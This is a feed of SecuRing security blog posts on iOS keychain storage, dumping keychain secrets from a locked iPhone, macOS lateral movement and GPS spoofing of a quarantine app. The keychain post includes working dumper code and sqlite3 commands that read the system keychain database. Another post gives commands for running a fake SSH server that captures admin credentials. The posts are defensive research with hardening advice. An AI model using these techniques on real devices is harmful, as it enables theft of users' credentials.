src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b8b259e0f564" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/5-security-tips-for-your-macos-environment-securing-b8b259e0f564">5 security tips for your macOS environment — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[The secure way to store secrets on iOS devices — Securing]]></title>
            <link>https://medium.com/securing/the-secure-way-to-store-secrets-on-ios-devices-securing-23071246388?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/23071246388</guid>
            <category><![CDATA[apple]]></category>
            <category><![CDATA[ios]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[app-security]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Thu, 15 Apr 2021 06:24:24 GMT</pubDate>
            <atom:updated>2021-04-27T07:18:42.204Z</atom:updated>
            <content:encoded><![CDATA[<h3>The secure way to store secrets on iOS devices</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yeycqoVaQYJrSuRpgp0CWA.jpeg" /></figure><h3>TL;DR</h3><ul><li>Whenever possible, avoid storing secrets on the device.</li><li>Keychain is the right place to store your small app’s secrets.</li><li>Entries saved in the Keychain can be additionally protected by setting proper accessibility and authentication flags.</li><li>Watch out what you synchronize with iCloud.</li><li>Files stored in the application container can also be additionally protected.</li><li>Always follow good mobile application development practices -&gt; see our <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">Guidelines on mobile application security — iOS edition </a>.</li></ul><h3>Background</h3><p>During the last few years, while pentesting iOS apps, I observed a lot of bad secret storage patterns. From a security perspective there is a recommended approach, but, before you start saving a secret on the device we need to make up if that is even necessary. The general idea is not to store sensitive information if you don’t have to. If you made that decision there are typically 2 kinds of secrets: small ones and the big ones. Small secrets can be for example session tokens, encryption keys, certificates. Big secrets are databases, videos, pictures. Below, I will show you a secure approach to store such data.</p><h3>A safe place for small secrets</h3><p>iOS Keychain is considered the best place to store your application’s small secrets. The Keychain is encrypted using a combination of Device Key and user passcode (if set). Your application will talk to security in order to interact with the SQLite database containing the encrypted secrets. The Keychain facility gives us features that help with restricting access to the entries, applying additional authentication policies, synchronizing the entries with iCloud, or even giving access to our entries to other apps.</p><p>iOS gives us a SecItem* C API to manage the secrets. From my experience, developers usually don’t use it directly as this API is a bit complicated. Instead, devs use different wrappers. In the example, I will use <a href="https://github.com/kishikawakatsumi/KeychainAccess">https://github.com/kishikawakatsumi/KeychainAccess</a></p><p>Let’s take a look at the code snippet below:</p><pre>import KeychainAccess <br>func saveSecureKeychainItem() { <br>let keychain = Keychain(service: &quot;example-service&quot;) DispatchQueue.global().async {    <br>do {        <br>try keychain        <br>.accessibility(.whenPasscodeSetThisDeviceOnly, authenticationPolicy: .biometryCurrentSet)        <br>.synchronizable(false)        <br>.set(&quot;secure-entry-value&quot;, key: &quot;secure-entry-key&quot;)    <br>} <br>catch let error {        <br>// error handling    <br>} } }</pre><p>I defined a service name and added the entry to the Keychain. I also set the secure attributes for that entry making sure that:</p><ul><li>It will be accessible only when the device is unlocked,</li><li>It will be saved only when the user set a password,</li><li>It will never leave the device,</li><li>It will never be synchronized,</li><li>It will require the user’s presence to be obtained,</li><li>It will be invalidated if the user changes anything in the biometry settings (for example enrolling a new Face to FaceID).</li></ul><p>By default, most of the frameworks / keychain wrappers will set minimal security constraints. <strong>However, I always recommend overriding the default values to be sure that the secret will be stored as expected.</strong> Implementation changes and thus the default settings change as well.</p><p>For the typical secrets, you won’t need that additional protections, such as requiring the user’s presence. The typical implementation looks as follows:</p><pre>import KeychainAccess <br>func saveLessSecureKeychainItem() { <br>let keychain = Keychain(service: &quot;example-service&quot;) DispatchQueue.global().async { <br>do { <br>try keychain <br>.accessibility(.afterFirstUnlockThisDeviceOnly) .synchronizable(false) <br>.set(&quot;secure-entry-value&quot;, key: &quot;secure-entry-key&quot;) } <br>catch let error { <br>// error handling <br>} } }</pre><p>I strongly encourage you to read more about the available secure flags. Look at the links below:</p><p>👉 <a href="https://developer.apple.com/documentation/security/keychain_services/keychain_items/restricting_keychain_item_accessibility">Restricting Keychain Item Accessibility</a><br>👉 <a href="https://developer.apple.com/documentation/localauthentication/accessing_keychain_items_with_face_id_or_touch_id">Accessing Keychain Items with Face ID or Touch ID</a><br>👉 <a href="https://developer.apple.com/documentation/security/ksecattrsynchronizable">kSecAttrSynchronizable</a></p><h3>Where to store big secrets?</h3><p>Big secrets are stored within your application’s container as regular files. By default, all the files are encrypted and cannot be accessed before the first unlock. So, any application (after the first device unlock) that can escape the sandbox will be able to get your big secrets. This of course requires exploiting a vulnerability in iOS but this article is about hardening. Under certain circumstances applications that are run on jailbroken devices can also escape their containers without any additional vulnerabilities.</p><p>The mechanism that allows us to control the on-disk files encryption is called Data Protection API. If you want your file to be accessible only when the device is unlocked, it means you want to use the NSFileProtectionComplete flag. Below you can see the example:</p><pre>do { <br>try data.write(to: fileURL, options: .completeFileProtection) <br>} catch let error { <br>// error handling <br>}</pre><p>OK, but what if your threat model requires an additional layer of protection? If you don’t want to be your big secret accessible to the sandbox escaper? Well, let’s take a look at the example below:</p><pre>import GRDB func openDB() -&gt; DatabaseQueue? { <br>do { <br>var config = Configuration() <br>config.prepareDatabase = { db in try <br>db.usePassphrase(getDatabasePassphraseFromKeychain()) <br>} <br>let dbQueue = try DatabaseQueue(path: getDBPath(), configuration: config) return dbQueue <br>} catch let error { <br>// error handling <br>} <br>return nil <br>}</pre><p>I used <a href="https://github.com/groue/GRDB.swift">GRDB</a> to create an SQLite database. What’s special about this database is that it’s encrypted using SQLCipher. The passphrase is stored securely in the Keychain. Please keep in mind that there are 2 traps. The first one is about the passphrase storage — do not hardcode it in your code! The second trap is managing the passphrase in-memory lifetime. As you can see in the example above, I obtain the secret in the closure to create the Configuration() that is then used to open the database. The passphrase is not stored in the memory longer than necessary.</p><h3>Summary</h3><p><strong>Do not store secrets on the device if you do not necessarily have to.</strong> That’s the sentence I want to repeat once again in the summary. My iOS apps pentesting experience shows that secrets are often stored insecurely. I saw them in Info.plist files or even hardcoded. In this article I wanted to show you how to properly store secrets that have to be on the device. Use Keychain with proper security flags in order to store small secrets. Consider additionally encrypting big secrets with the properly stored encryption key.</p><p>It is also always worth following good practices in the iOS application development process. In this topic, we especially recommend our own <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">guide</a>, where we have gathered our experience with ready-made solutions.</p><p>If you have any questions, feel free to use our contact form, or reach directly to me on <a href="https://twitter.com/_r3ggi">Twitter </a>on <a href="https://www.linkedin.com/in/wojciech-regula/">LinkedIn</a>.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/the-secure-way-to-store-secrets-on-ios-devices/"><em>https://www.securing.pl</em></a><em> on April 15, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=23071246388" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/the-secure-way-to-store-secrets-on-ios-devices-securing-23071246388">The secure way to store secrets on iOS devices — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Stealing your app’s keychain entries from locked iPhone]]></title>
            <link>https://medium.com/securing/stealing-your-apps-keychain-entries-from-locked-iphone-5c40fdb13a7a?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/5c40fdb13a7a</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[iphone]]></category>
            <category><![CDATA[keychain]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[ios]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Tue, 05 Jan 2021 13:43:16 GMT</pubDate>
            <atom:updated>2021-01-08T12:25:45.086Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Elz_Zq2vmw9jqqrrXNpAMw.jpeg" /></figure><h3>What is the Keychain?</h3><p>Keychain is essentially the safest place on your phone in terms of storing data. It is used by developers to store passwords, certificates, identities, or other keys in many forms. It is quickly adopted and many developers already understand how important it is to keep the most sensitive data in a place that was made exactly for this purpose. As good as it sounds, this doesn’t mean that using a keychain makes your application 100% safe. (Not so) Commonly made mistakes during the development process like using a deprecated API or not updating the app for a long time may lead to user data being exposed for future attacks. Oftentimes, developers tend to use incorrect attributes to secure their keys. Sometimes because of lack of experience, sometimes because “this way it was easier”.</p><p>Until the end of last year, we could say that getting access to the keychain is difficult and our data is mostly secure. Stealing data from someone’s keychain wasn’t trivial. Victims’ phones usually needed to be already jailbroken and best if the password for ssh wasn’t changed from *alpine*. In this article, we will show you how to access some Keychain entries in a different way.</p><h3>What can go wrong?</h3><p>Asking yourself “What can go wrong if I store data like this?” should be common practice while writing code. Sadly, in an environment where everything has to work until yesterday, no one has time for questioning if storing “Password1235” as plaintext with the attribute “Accessible always” is a good idea. No time for that. And then, there are consequences.</p><p>Checkm8 — bootrom exploit by @axi0mix revolutionized the Jailbreak scene, the world of tweak writers, but what’s the most important — had a huge impact on security.</p><p>Apple quickly realized what is happening around and had to re-think what and when is accessible to reduce the amount of vulnerable data. Keychain — the safest place for storing data became vulnerable as well. Accessing keys with the attribute “kSecAttrAcessibleAlways” “kSecAttrAcessibleAlwaysThisDeviceOnly” was an obvious choice for apple to restrict, so they quickly deprecated those options and added warnings in Xcode to, well… warn developers not to use those attributes. And so half a year later @m1nacriss released his m1napatcher that was simply getting rid of USB-Restricted mode and at the same time allowing not authorized users to jailbreak devices that previously needed to be unlocked. Now the very same functionality is included in checkra1n jailbreak, allowing the attacker to deploy ssh and any binary it wants to iDevice that is being in its hands. Here joins the main character of today’s episode — keychain dumper.</p><p>Keychain dumper is a simple, yet powerful application that allows you to extract keys from the iOS keychain. Accessing different parts of the keychain utilizes different requirements for dumping its information. From the point of the attacker — low hanging fruit as “kSecAttrAccessibleAlways” is exactly what we’re looking for. No password is needed, not even for the lock screen.</p><p>Our team decided to investigate how much data we can extract from over a hundred different applications including VPNs, password managers, and most popular applications in Canadian, Polish, and Japanese App Store. We looked for keys, tokens, passwords… basically everything that could be useful for an attacker. <strong>And the results were surprising.</strong></p><p>AccessibleAlways keychain attribute was common even in <strong>popular applications.</strong></p><h3>Dumping always accessible entries</h3><p>As we showed in the previous section, there are <strong>entries that can be dumped always, even from locked iPhone</strong>.</p><p>Before we can create and install the keychain dumper, we have to jailbreak our iDevice. For that purpose we used unc0ver jailbreak that works for iPhones up to X. All we need is just to turn the iPhone to recovery mode, connect the device to our mac and run the checkra1n. After completion, we can connect via SSH. Remember that the SSH server is bound to port 44 (not 22). Another interesting thing is that we have skipped the USB Restricted Mode. New versions of the checkra1n kill that so we do not have to worry about it:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/599/0*aRTWFH_NoofnO54S.png" /></figure><p>So, when creating a Keychain dumper we had to make sure we would ask only for the always accessible entries. So, at first, we open the Keychain-2.db database and query for the vulnerable application groups:</p><pre>select distinct agrp from genp where pdmn in (&#39;dk&#39;, &#39;dku&#39;) union select distinct agrp from inet where pdmn in (&#39;dk&#39;, &#39;dku&#39;) union select distinct agrp from cert where pdmn in (&#39;dk&#39;, &#39;dku&#39;) union select distinct agrp from keys where pdmn in (&#39;dk&#39;, &#39;dku&#39;);</pre><h4>Let’s analyze the SQL query:</h4><p>We take data from the following tables:</p><ul><li>“genp” what stands for Generic Passwords,</li><li>“inet” what stands for Internet Passwords,</li><li>“cert” — Certificates,</li><li>“Keys” — Cryptographic Keys</li></ul><p>We are interested in only “dk” and “dku” kSecAttrAccessible values. They stand for:</p><ul><li>kSecAttrAccessibleAlways (“dk”)</li><li>kSecAttrAccessibleAlwaysThisDeviceOnly (“dku”)</li></ul><p>So, summing it up the query retrieves the application group keychain names that have entries that are accessible always — even before the first unlock. These names will be later used for getting the actual keychain data.</p><p>The next step is to create the Keychain query. We have used the following code:</p><pre>-(NSMutableDictionary * ) prepareDict {<br>  NSMutableDictionary * query = [NSMutableDictionary new];<br>  [query setObject: (__bridge id) kCFBooleanTrue forKey: (__bridge id) kSecReturnAttributes];<br>  [query setObject: (__bridge id) kSecMatchLimitAll forKey: (__bridge id) kSecMatchLimit];<br>  [query setObject: (__bridge id) kCFBooleanTrue forKey: (__bridge id) kSecReturnData];<br>  return query;<br>} - (NSMutableDictionary * ) prepareDictWithkSecAccessibleAlways {<br>  NSMutableDictionary * query = [self prepareDict];<br>  [query setObject: (__bridge id) kSecAttrAccessibleAlways forKey: (__bridge id) kSecAttrAccessible];<br>  return query;<br>} - (NSMutableDictionary * ) prepareDictWithkSecAccessibleAlwaysThisDeviceOnly {<br>  NSMutableDictionary * query = [self prepareDict];<br>  [query setObject: (__bridge id) kSecAttrAccessibleAlwaysThisDeviceOnly forKey: (__bridge id) kSecAttrAccessible];<br>  return query;<br>} - (void) queryWithGroup: (NSString * ) group {<br>    NSArray * secItemClasses = [NSArray arrayWithObjects: (__bridge id) kSecClassGenericPassword, (__bridge id) kSecClassInternetPassword, (__bridge id) kSecClassCertificate, (__bridge id) kSecClassKey, (__bridge id) kSecClassIdentity, nil];<br>    NSArray * dictsWithDifferentAccessibilityLevels = @[[self prepareDictWithkSecAccessibleAlways], [self prepareDictWithkSecAccessibleAlwaysThisDeviceOnly]];<br>    for (NSMutableDictionary * dict in dictsWithDifferentAccessibilityLevels) {<br>      [dict setObject: group forKey: (__bridge id) kSecAttrAccessGroup];<br>      for (id secItemClass in secItemClasses) {<br>        [dict setObject: secItemClass forKey: (__bridge id) kSecClass];<br>        CFTypeRef result = NULL;<br>        if (SecItemCopyMatching((__bridge CFDictionaryRef) dict, &amp; result) == noErr) {<br>          if (result != NULL) {<br>            NSArray * resultArray = (__bridge NSArray * ) result;<br>            for (NSDictionary * keychainEntryDict in resultArray) {<br>              [self printEntry: keychainEntryDict];<br>            }<br>            CFRelease(result);<br>          }<br>        }<br>      }<br>    }</pre><p>Next, we have to build the dumper, and sign with the specific keychain entitlements. This part is tricky. Before iOS 13.5 we could have set the “keychain-access-groups” to “*” (wildcard) and query for all entries. Since iOS 13.5 the wildcard is no longer working. We can dump all the access groups by requesting following commands:</p><pre>sqlite3 /var/Keychains/keychain-2.db &quot;SELECT DISTINCT agrp FROM genp&quot; &gt; ./groups.txt <br>sqlite3 /var/Keychains/keychain-2.db &quot;SELECT DISTINCT agrp FROM cert&quot; &gt;&gt; ./groups.txt <br>sqlite3 /var/Keychains/keychain-2.db &quot;SELECT DISTINCT agrp FROM inet&quot; &gt;&gt; ./groups.txt <br>sqlite3 /var/Keychains/keychain-2.db &quot;SELECT DISTINCT agrp FROM keys&quot; &gt;&gt; ./groups.txt</pre><p>Let’s take Viber’s access group as an example:</p><pre>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br>&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;<a href="http://www.apple.com/DTDs/PropertyList-1.0.dtd">http://www.apple.com/DTDs/PropertyList-1.0.dtd</a>&quot;&gt;<br>&lt;plist version=&quot;1.0&quot;&gt;<br> &lt;dict&gt;<br>  &lt;key&gt;keychain-access-groups&lt;/key&gt;<br>  &lt;array&gt;<br>   &lt;string&gt;69V327AA4Z.group.viber.share.keychain&lt;/string&gt;<br>  &lt;/array&gt;<br>  &lt;key&gt;platform-application&lt;/key&gt;<br>  &lt;true/&gt;<br>  &lt;key&gt;com.apple.private.security.no-container&lt;/key&gt;<br>  &lt;true/&gt;<br> &lt;/dict&gt;<br>&lt;/plist&gt;</pre><p>We can sign the application using the “ldid” tool (ldid -Sents.xml app). When the application is prepared, use the “scp” to upload the dumper to your iPhone.</p><p>We have opened the dumper and observed Viber’s entries <strong>before the first unlock</strong> of the iPhone:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1002/0*Efs5xLpjWEjs4zcq.png" /></figure><h3>Additional thoughts</h3><p>As we showed in the “What can go wrong” section, applications store sensitive information insecurely. We have observed also that there are also other serious consequences:</p><h3>Storing PIN to the application</h3><p>We found one finance application that stored a plaintext PIN with the alwaysAccessible attribute. From our experience users usually use the same PIN in applications and to unlock their iPhones. So, such a scenario may lead to unlocking the device.</p><h3>Listing applications</h3><p>Since the Keychain database stores the application access groups it is possible to retrieve a list of installed applications on the iDevice.</p><h3>Breaking VPNs</h3><p>Seeing TorGuard storing users password and login in plaintext with kSecAttrAccesibleAlways is even more terrible if you take under consideration that it is most recommended VPN application on <a href="https://www.vpntierlist.com/vpn-tier-list/">TomSpark’s VPN Tier List</a>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/530/0*v8kpy2GzLGNpZaWb.jpg" /></figure><p>TorGuard has an open bug bounty program, but after half a year we still didn’t get a response for the reported problem, although they changed to kSecAttrAccessibleAlwaysThisDeviceOnly and now they store plaintext information in a form of plist in the Keychain what still can be decoded and accessed.</p><pre>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br>&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;<a href="http://www.apple.com/DTDs/PropertyList-1.0.dtd">http://www.apple.com/DTDs/PropertyList-1.0.dtd</a>&quot;&gt;<br>&lt;plist version=&quot;1.0&quot;&gt;<br> &lt;dict&gt;<br>  &lt;key&gt;$archiver&lt;/key&gt;<br>  &lt;string&gt;NSKeyedArchiver&lt;/string&gt;<br>  &lt;key&gt;$objects&lt;/key&gt;<br>  &lt;array&gt;<br>   &lt;string&gt;$null&lt;/string&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;$class&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;7&lt;/integer&gt;<br>    &lt;/dict&gt;<br>    &lt;key&gt;email&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;2&lt;/integer&gt;<br>    &lt;/dict&gt;<br>    &lt;key&gt;id&lt;/key&gt;<br>    &lt;integer&gt;-1&lt;/integer&gt;<br>    &lt;key&gt;vpn-credentials&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;3&lt;/integer&gt;<br>    &lt;/dict&gt;<br>   &lt;/dict&gt;<br>   &lt;string&gt;anonymous&lt;/string&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;$class&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;6&lt;/integer&gt;<br>    &lt;/dict&gt;<br>    &lt;key&gt;password&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;5&lt;/integer&gt;<br>    &lt;/dict&gt;<br>    &lt;key&gt;username&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;4&lt;/integer&gt;<br>    &lt;/dict&gt;<br>   &lt;/dict&gt;<br>   &lt;string&gt;<a href="mailto:secretmail@mail.com">secretmail@mail.com</a>&lt;/string&gt;<br>   &lt;string&gt;SecretPassword&lt;/string&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;$classes&lt;/key&gt;<br>    &lt;array&gt;<br>     &lt;string&gt;MDCredentials&lt;/string&gt;<br>     &lt;string&gt;MDResponse&lt;/string&gt;<br>     &lt;string&gt;NSObject&lt;/string&gt;<br>    &lt;/array&gt;<br>    &lt;key&gt;$classname&lt;/key&gt;<br>    &lt;string&gt;MDCredentials&lt;/string&gt;<br>   &lt;/dict&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;$classes&lt;/key&gt;<br>    &lt;array&gt;<br>     &lt;string&gt;MDUser&lt;/string&gt;<br>     &lt;string&gt;MDResponse&lt;/string&gt;<br>     &lt;string&gt;NSObject&lt;/string&gt;<br>    &lt;/array&gt;<br>    &lt;key&gt;$classname&lt;/key&gt;<br>    &lt;string&gt;MDUser&lt;/string&gt;<br>   &lt;/dict&gt;<br>  &lt;/array&gt;<br>  &lt;key&gt;$top&lt;/key&gt;<br>  &lt;dict&gt;<br>   &lt;key&gt;root&lt;/key&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;CF$UID&lt;/key&gt;<br>    &lt;integer&gt;1&lt;/integer&gt;<br>   &lt;/dict&gt;<br>  &lt;/dict&gt;<br>  &lt;key&gt;$version&lt;/key&gt;<br>  &lt;integer&gt;100000&lt;/integer&gt;<br> &lt;/dict&gt;<br>&lt;/plist&gt;</pre><p>Let’s imagine a worse scenario where an attacker steals the victim’s iPhone, dumps the keychain, and gains access to the company’s internal network.</p><h3>Summary</h3><p>In this article, we wanted to show you that the Keychain is the right place to store your app’s secrets, but it has to be used wisely. <strong>Setting bad accessible attributes may allow attackers to steal secrets from relatively modern iPhones with the newest iOS versions.</strong></p><p>We recommend setting the accessibility attribute at least to <a href="https://developer.apple.com/documentation/security/ksecattraccessibleafterfirstunlock?language=objc">kSecAttrAccessibleAfterFirstUnlock</a>.</p><p>For the most important secrets consider using <a href="https://developer.apple.com/documentation/security/ksecattraccessiblewhenpasscodesetthisdeviceonly?language=objc">kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly</a> which makes sure that the entry will be saved only on a device that has the Passcode/PIN set and the entry will not ever leave the Keychain.</p><p>Special thanks to <strong>Dawid Pastuszak</strong> — co-author of this article.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/stealing-your-apps-keychain-entries-from-locked-iphone/"><em>https://www.securing.pl</em></a><em> on January 5, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=5c40fdb13a7a" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/stealing-your-apps-keychain-entries-from-locked-iphone-5c40fdb13a7a">Stealing your app’s keychain entries from locked iPhone</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Local Privilege Escalation in macOS infrastructure]]></title>
            <link>https://medium.com/securing/local-privilege-escalation-in-macos-infrastructure-df02df60bab2?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/df02df60bab2</guid>
            <category><![CDATA[apple]]></category>
            <category><![CDATA[infrastructure]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[security-testing]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Wed, 09 Dec 2020 12:03:07 GMT</pubDate>
            <atom:updated>2021-01-08T10:38:40.282Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="LPE in macOS" src="https://cdn-images-1.medium.com/max/1024/1*7tSBe_CvSNxJ1sB5TYTIEg.jpeg" /></figure><h3>MacOS infrastructure</h3><p>Apple devices have been present in the companies for a long time. Wherever there is a need to deploy iOS applications, testers and programmers have to use Macs. UX/UI designers and movie editors use Macs for apps that have only Apple versions. It is also worth noting that Macs are introduced to companies as the managers and directors want to use them as well. While Windows infrastructure in big companies is usually mature and well-tested, Macs infrastructure is usually no man’s land. After digging in some huge networks we observed a lot of ugly hacks and bad scripting exposing the company’s security. Compromising one Mac can have influence on the whole intranet as they have often access to SMB shares, do Kerberos authentication to the internal resources.</p><h3>Vulnerable pattern</h3><p>In this article we’d like to show you a common, vulnerable pattern present in macOS networks. Machines need to be somehow managed. The most efficient way nowadays are hybrid solutions that both enroll devices to the MDM and install agents. The MDM profiles are nice but have limitations, sofor the wider management functionalities, systems employ traditional SSH connections.<strong> The problem starts when macadmins use the same account with the same password across all devices in the network.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*cs2C3xCtvwA-pifK.jpg" /></figure><h3>Elevating privileges on XPC vulnerabilities example</h3><p>Typically in the managed Mac infrastructures users do not have root privileges. They run on standard users that are not in the admin group and are not included in the sudoers file. Attacker who compromises one machine, usually wants to perform a lateral movement and compromise other Macs. If the network implements the above-mentioned vulnerable pattern, the easiest way is to elevate permissions from the user to root and steal the macadmin’s password via a fake SSH server.Recently, one of our security consultants had a talk about “Abusing &amp; Securing XPC applications”. Using XPC to elevate user’s privileges seems to be a perfect solution for that purpose. As shown in the presentation, the XPC vulnerabilities are everywhere. If you are interested in XPC exploitation, we strongly recommend watching <a href="https://www.securing.pl/en/presentation/abusing-securing-xpc-in-macos-apps/"><strong>This talk.</strong></a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*sSkwtfafBsVRNoDA.jpg" /></figure><h3>Lateral movement</h3><p>To fake the SSH server, we can simply use the <a href="https://github.com/droberson/ssh-honeypot">SSH-Honeypot project</a>. Clone it and run the following commands:</p><pre>#!/bin/sh brew install libssh json-c make -f MakefileOSX bin/ssh-honeypot -r ./ssh-honeypot.rsa</pre><p>Now wait until the macadmin connects to the SSH:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*EL6_11-Q9XiNL_Eo.png" /></figure><p>Now, we can perform lateral movement to compromise other machines.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*GefGoY5Iz4HfFZYE.jpg" /></figure><h3>Summary</h3><p>In this article we wanted to present you a common vulnerability pattern that we observe in Mac infrastructures. Elevating privileges on one machine may allow the attacker to compromise all Macs in the company and thus access sensitive resources available from each machine. Vulnerabilities in applications are not rare, so in professional networks remember about logging and incident response solutions. Keep in mind that responding to incidents is a defense-in-depth practice and every large Macs network should be thoroughly tested. Infrastructure assessment allows detecting such vulnerable patterns and making your network more secure.</p><p>If you want to secure your infrastructure leave your contact details in our form. We will get back to you to discuss your case as soon as possible.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/local-privilege-escalation-in-macos-infrastructure/"><em>https://www.securing.pl</em></a><em> on December 9, 2020.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=df02df60bab2" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/local-privilege-escalation-in-macos-infrastructure-df02df60bab2">Local Privilege Escalation in macOS infrastructure</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Why is jailbreak detection important? — COVID apps case]]></title>
            <link>https://medium.com/securing/why-is-jailbreak-detection-important-covid-apps-case-cacc02e2a7f6?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/cacc02e2a7f6</guid>
            <category><![CDATA[ios]]></category>
            <category><![CDATA[covid19]]></category>
            <category><![CDATA[app-security]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Thu, 13 Aug 2020 07:57:19 GMT</pubDate>
            <atom:updated>2020-08-13T07:57:19.798Z</atom:updated>
            <content:encoded><![CDATA[<h3>Why is jailbreak detection important? — COVID apps case</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*c-ERWRqnbI4x73lH" /></figure><p>Some time ago I got stuck in the USA because of the COVID-19. After coming back to Poland with the “evacuation flight” I had to undergo mandatory quarantine for 14 days. Every day the Polish Police was visiting me and checking if I’m sitting at home and don’t go outside. As we all expected it was a big overhead to the Police since they had to visit every day each quarantined person. My friends told me that I can install an official government app that reports my location everyday. After the installation, the user has to complete an everyday task that includes sending a selfie from home. Under the hood, the application also reports the user’s location. I started considering if the application is properly protected against the GPS spoofing attacks.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FYJDpfht5PU5i0%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2FYJDpfht5PU5i0%2Fgiphy.gif&amp;image=https%3A%2F%2Fi.giphy.com%2Fmedia%2FYJDpfht5PU5i0%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="390" frameborder="0" scrolling="no"><a href="https://medium.com/media/25b83d3e25cc70638712f6ecb3c96e1a/href">https://medium.com/media/25b83d3e25cc70638712f6ecb3c96e1a/href</a></iframe><h3>Use the hyperdrive</h3><p>There are many applications/teaks allowing changing your GPS coordinates on iOS. Detection of those is however not simple. There are a few approaches like constantly reporting the user’s location or analyzing the user’s velocity. The quarantine application I installed didn’t support such mechanisms (actually I saw an anti GPS spoofing method in the code but it was probably only a mock). So, I jailbroken my iPhone, downloaded the AkLocationX tweak and opened the quarantine application. After successful registration I spoofed my location as follows:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/750/0*cYvGlXArMm-bmFKF" /></figure><p>Opened the application and it turned out I was on somewhere in the North Pacific Ocean.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/750/0*OpTQkW5EGUkjLz8_" /></figure><p>As you can see, tricking this application was rather simple, and a script-kiddie can bypass the quarantine. That may influence social health. In the next section, I’ll show you an improvement that can help with detecting such suspicious behaviors.</p><h3>Jailbreak detection</h3><p>As <a href="https://www.google.com/url?q=https://en.wikipedia.org/wiki/IOS_jailbreaking&amp;sa=D&amp;ust=1597307381749000&amp;usg=AFQjCNFHVg12E-GPO5sz0vV4OUl6qvjkLQ">Wikipedia</a> says:</p><blockquote>Jailbreaking is the privilege escalation of an Apple device for the purpose of removing software restrictions imposed by Apple on iOS, iPadOS, tvOS, and watchOS operating systems. This is typically done by using a series of kernel patches. 